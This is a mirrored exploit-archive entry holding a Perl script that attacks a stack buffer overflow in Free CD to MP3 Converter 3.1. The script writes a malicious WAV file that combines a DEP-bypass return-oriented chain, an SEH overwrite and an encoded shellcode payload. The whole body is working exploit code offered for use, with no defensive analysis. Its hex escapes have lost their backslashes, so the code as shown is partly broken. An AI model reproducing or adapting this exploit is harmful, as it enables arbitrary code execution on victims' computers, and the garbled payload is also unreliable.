[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Published : 2010-11-20
# Author : riusksk
# Previous Title : Minishare 1.5.5 BoF Vulnerability (users.txt) - EggHunter -
# Next Title : Native Instruments Service Center 2.2.5 Local Privilege Escalation Vulnerability
# Exploit Title: ¡êoFree CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Origianl exploit by C4SS!0 G0M3S¡êohttp://www.exploit-db.com/exploits/15483/
# Modified by riusksk¡ê¡§http://riusksk.blogbus.com¡ê?
# Test on Windows XP SP3 CN
# Data¡êo2010/11/20
#!/usr/bin/perl
my $junk1 = 'A'x 4112;
my $disabledep = "x68xdcxecx77"; # 0x77ecdc68 - push esp,pop ebp,ret 4,adjust ebp
$disabledep = $disabledep."xeax18x97x7c"; # 0x7c9718ea - set eax to 1
$disabledep = $disabledep."xffxffxffxff"; # balance the stack
$disabledep = $disabledep."x24xcdx93x7c"; # 0x7c93cd24 - run NX Disable routine
$disabledep = $disabledep."xffxffxffxff"; # balance the stack
my $junk2 = 'B'x 24;
my $nseh = "x90x90xebx06"; # jmp 06
my $seh = "x80x14x40x00"; # pop pop ret, no safeseh
my $nops = "x90x90";
my $shellcode =
"xb8xc7xaex8exaexd9xc7x33xc9xb1x31xd9x74x24" .
"xf4x5bx31x43x14x83xebxfcx03x43x10x25x5bx72" .
"x46x20xa4x8bx97x52x2cx6exa6x40x4axfax9bx54" .
"x18xaex17x1fx4cx5bxa3x6dx59x6cx04xdbxbfx43" .
"x95xeax7fx0fx55x6dxfcx52x8ax4dx3dx9dxdfx8c" .
"x7axc0x10xdcxd3x8ex83xf0x50xd2x1fxf1xb6x58" .
"x1fx89xb3x9fxd4x23xbdxcfx45x38xf5xf7xeex66" .
"x26x09x22x75x1ax40x4fx4dxe8x53x99x9cx11x62" .
"xe5x72x2cx4axe8x8bx68x6dx13xfex82x8dxaexf8" .
"x50xefx74x8dx44x57xfex35xadx69xd3xa3x26x65" .
"x98xa0x61x6ax1fx65x1ax96x94x88xcdx1exeexae" .
"xc9x7bxb4xcfx48x26x1bxf0x8bx8exc4x54xc7x3d" .
"x10xeex8ax2bxe7x63xb1x15xe7x7bxbax35x80x4a" .
"x31xdaxd7x53x90x9ex26xa5x29x0bxbex1fxd8x76" .
"xa2xa0x36xb4xdbx22xb3x45x18x3axb6x40x64xfd" .
"x2ax39xf5x6bx4dxeexf6xbex3ex78x09";
open($fp,">test.wav");
print $fp $junk1.$disabledep.$junk2.$nseh.$seh.$nops.$shellcode;
close $fp;